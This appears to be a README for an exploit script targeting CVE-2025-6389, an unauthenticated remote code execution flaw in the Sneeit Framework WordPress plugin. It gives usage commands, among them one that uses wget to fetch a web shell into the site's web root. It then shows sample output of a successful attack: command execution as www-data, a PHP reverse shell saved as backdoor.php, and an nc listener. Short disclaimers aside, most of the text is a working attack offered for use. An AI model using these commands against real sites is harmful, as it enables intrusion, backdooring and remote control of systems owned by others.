
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 is a Critical (CVSS 9.8) vulnerability in the Sneeit Framework WordPress plugin (≤ 8.3), widely used by popular themes. It allows unauthenticated remote code execution — the most dangerous class of web vulnerabilities.
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die)Use this only on targets you are officially authorized to test (clear scope + RoE).
The vulnerability is still being heavily exploited in the wild right now.
Here’s exactly what you will see in your terminal when the exploit actually works (100% successful exploitation of CVE-2025-6389 on a vulnerable target running Sneeit Framework ≤ 8.3):
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
Then on your own machine:
nc -lvnp 4444
→ You instantly get a fully interactive reverse shell as www-data.
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
You know it worked when you see any of these:
That’s it. If you get any of the above → full unauthenticated RCE achieved.
Paste your exact output here if you want me to confirm 100% whether it worked or not.
sneeit_articles_pagination_callback()call_user_func() → arbitrary code executionThis information is provided for defensive and educational purposes only 🛡️. Do not use it to exploit systems you do not own or have explicit permission to test 🚫. Always follow legal and ethical guidelines when working with security vulnerabilities ⚖️✨